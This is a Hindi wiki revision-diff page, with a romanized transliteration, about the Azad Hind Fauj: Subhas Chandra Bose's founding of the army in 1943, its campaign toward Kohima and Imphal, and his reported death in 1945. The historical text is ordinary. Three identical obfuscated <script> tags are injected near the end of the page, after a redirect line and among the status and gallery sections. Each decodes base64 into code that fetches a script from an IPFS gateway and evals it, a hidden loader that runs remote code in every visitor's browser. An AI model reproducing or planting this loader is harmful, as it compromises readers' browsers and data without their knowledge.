Difference between revisions of "आज़ाद हिन्द फ़ौज"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Azad-Hind-Fauj.jpg|thumb|आज़ाद हिन्द फ़ौज का ध्वज]]
 
[[चित्र:Azad-Hind-Fauj.jpg|thumb|आज़ाद हिन्द फ़ौज का ध्वज]]
 
'''आज़ाद हिन्द फ़ौज''' (गठन-[[21 अक्टूबर]], 1943)  
 
'''आज़ाद हिन्द फ़ौज''' (गठन-[[21 अक्टूबर]], 1943)  
[[सुभाष चन्द्र बोस]] का [[गांधीजी]] से मतभेद होने के कारण वे [[कांग्रेस]] से अलग हो गए और [[ब्रिटिश]] जेल से भागकर [[जापान]] पहुँच गए। बोस ने जापानियों के प्रभाव और सहायता से, दक्षिण-पूर्वी एशिया से [[जापान]] द्वारा एकत्रित क़रीब 40,000 भारतीय स्त्री-पुरुषों की प्रशिक्षित सेना का गठन शुरू कर दिया।  
+
[[सुभाष चन्द्र बोस]] का [[गांधीजी]] से मतभेद होने के कारण वे [[कांग्रेस]] से अलग हो गए और ब्रिटिश जेल से भागकर [[जापान]] पहुँच गए। बोस ने जापानियों के प्रभाव और सहायता से, दक्षिण-पूर्वी एशिया से [[जापान]] द्वारा एकत्रित क़रीब 40,000 भारतीय स्त्री-पुरुषों की प्रशिक्षित सेना का गठन शुरू कर दिया।  
 
==स्थापना==   
 
==स्थापना==   
 
'नेताजी' के नाम से विख्यात सुभाष चन्द्र ने सशक्त क्रान्ति द्वारा भारत को स्वतंत्र कराने के उद्देश्य से 21 अक्टूबर, 1943 को 'आज़ाद हिन्द सरकार' की स्थापना की तथा 'आज़ाद हिन्द फ़ौज' का गठन किया इस संगठन के प्रतीक चिह्न पर एक झंडे पर दहाड़ते हुए [[बाघ]] का चित्र बना होता था।<br /><blockquote><span style="color: #8f5d31">क़दम-क़दम बढाए जा, खुशी के गीत गाए जा-इस संगठन का वह गीत था, जिसे गुनगुना कर संगठन के सेनानी जोश और उत्साह से भर उठते थे।</span></blockquote>जापानी सैनिकों के साथ उनकी तथाकथित आज़ाद हिंद फ़ौज [[रंगून]] (यांगून) से होती हुई थल मार्ग से भारत की ओर बढ़ती, [[18 मार्च]] सन 1944 ई. की [[कोहिमा]] और [[इम्फाल|इम्फ़ाल]] के भारतीय मैदानी क्षेत्रों में पहुँच गई। [[चित्र:Azad-Hind-Fauj-Groupphoto.jpg|thumb|250px|left|[[सुभाष चन्द्र बोस]] और आज़ाद हिन्द फ़ौज के सदस्य]] जापानी वायुसेना से सहायता न मिलने के कारण एक भीषण लड़ाई में भारतीयों और जापानियों की मिली-जुली सेना हार गई और उसे पीछे हटना पड़ा। लेकिन आज़ाद हिंद फ़ौज कुछ अर्से तक बर्मा और बाद में हिंद-चीन में अड्डों वाली मुक्तिवाहिनी सेना के रूप में अपनी पहचान बनाए रखने में सफल रही। इसी सेना ने 1943 से 1945 तक शक्तिशाली अंग्रेज़ों से युद्ध किया था तथा उन्हें भारत को स्वतंत्रता प्रदान कर देने के विषय में सोचने के लिए मजबूर किया था। सन 1943 से 1945 तक 'आज़ाद हिन्द सेना' अंग्रेज़ों से युद्ध करती रही। अन्ततः ब्रिटिश शासन को उन्होंने महसूस करा दिया कि [[भारत]] को स्वतंत्रता देनी ही पड़ेगी।
 
'नेताजी' के नाम से विख्यात सुभाष चन्द्र ने सशक्त क्रान्ति द्वारा भारत को स्वतंत्र कराने के उद्देश्य से 21 अक्टूबर, 1943 को 'आज़ाद हिन्द सरकार' की स्थापना की तथा 'आज़ाद हिन्द फ़ौज' का गठन किया इस संगठन के प्रतीक चिह्न पर एक झंडे पर दहाड़ते हुए [[बाघ]] का चित्र बना होता था।<br /><blockquote><span style="color: #8f5d31">क़दम-क़दम बढाए जा, खुशी के गीत गाए जा-इस संगठन का वह गीत था, जिसे गुनगुना कर संगठन के सेनानी जोश और उत्साह से भर उठते थे।</span></blockquote>जापानी सैनिकों के साथ उनकी तथाकथित आज़ाद हिंद फ़ौज [[रंगून]] (यांगून) से होती हुई थल मार्ग से भारत की ओर बढ़ती, [[18 मार्च]] सन 1944 ई. की [[कोहिमा]] और [[इम्फाल|इम्फ़ाल]] के भारतीय मैदानी क्षेत्रों में पहुँच गई। [[चित्र:Azad-Hind-Fauj-Groupphoto.jpg|thumb|250px|left|[[सुभाष चन्द्र बोस]] और आज़ाद हिन्द फ़ौज के सदस्य]] जापानी वायुसेना से सहायता न मिलने के कारण एक भीषण लड़ाई में भारतीयों और जापानियों की मिली-जुली सेना हार गई और उसे पीछे हटना पड़ा। लेकिन आज़ाद हिंद फ़ौज कुछ अर्से तक बर्मा और बाद में हिंद-चीन में अड्डों वाली मुक्तिवाहिनी सेना के रूप में अपनी पहचान बनाए रखने में सफल रही। इसी सेना ने 1943 से 1945 तक शक्तिशाली अंग्रेज़ों से युद्ध किया था तथा उन्हें भारत को स्वतंत्रता प्रदान कर देने के विषय में सोचने के लिए मजबूर किया था। सन 1943 से 1945 तक 'आज़ाद हिन्द सेना' अंग्रेज़ों से युद्ध करती रही। अन्ततः ब्रिटिश शासन को उन्होंने महसूस करा दिया कि [[भारत]] को स्वतंत्रता देनी ही पड़ेगी।

Revision as of 09:40, 21 July 2011

thumb|azad hind fauj ka dhvaj azad hind fauj (gathan-21 aktoobar, 1943) subhash chandr bos ka gaandhiji se matabhed hone ke karan ve kaangres se alag ho ge aur british jel se bhagakar japan pahuanch ge. bos ne japaniyoan ke prabhav aur sahayata se, dakshin-poorvi eshiya se japan dvara ekatrit qarib 40,000 bharatiy stri-purushoan ki prashikshit sena ka gathan shuroo kar diya.

sthapana

'netaji' ke nam se vikhyat subhash chandr ne sashakt kranti dvara bharat ko svatantr karane ke uddeshy se 21 aktoobar, 1943 ko 'azad hind sarakar' ki sthapana ki tatha 'azad hind fauj' ka gathan kiya is sangathan ke pratik chihn par ek jhande par daha date hue bagh ka chitr bana hota tha.

qadam-qadam badhae ja, khushi ke git gae ja-is sangathan ka vah git tha, jise gunaguna kar sangathan ke senani josh aur utsah se bhar uthate the.

japani sainikoan ke sath unaki tathakathit azad hiand fauj rangoon (yaangoon) se hoti huee thal marg se bharat ki or badhati, 18 march san 1944 ee. ki kohima aur imfal ke bharatiy maidani kshetroan mean pahuanch gee. [[chitr:Azad-Hind-Fauj-Groupphoto.jpg|thumb|250px|left|subhash chandr bos aur azad hind fauj ke sadasy]] japani vayusena se sahayata n milane ke karan ek bhishan l daee mean bharatiyoan aur japaniyoan ki mili-juli sena har gee aur use pichhe hatana p da. lekin azad hiand fauj kuchh arse tak barma aur bad mean hiand-chin mean addoan vali muktivahini sena ke roop mean apani pahachan banae rakhane mean saphal rahi. isi sena ne 1943 se 1945 tak shaktishali aangrezoan se yuddh kiya tha tatha unhean bharat ko svatantrata pradan kar dene ke vishay mean sochane ke lie majaboor kiya tha. san 1943 se 1945 tak 'azad hind sena' aangrezoan se yuddh karati rahi. antatah british shasan ko unhoanne mahasoos kara diya ki bharat ko svatantrata deni hi p degi.

japan ki har ke sath bos ka bhavishy bhi doob gaya. mana jata hai ki japan ke atmasamarpan ki ghoshana ke kuchh din bad, dakshin-poorvi eshiya se bhagate hue ek havaee durghatana mean jal jane se hue ghavoan ke karan taivan ke ek japani aspatal mean 18 agast san 1945 ee. mean bos ki mrityu ho gee. kisi ko vishvas hi nahian hua. logoan ko laga ki kisi din ve phir samane a kh de hoange. aj itane varshoan bad bhi jan manas unaki rah dekhata hai.

  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh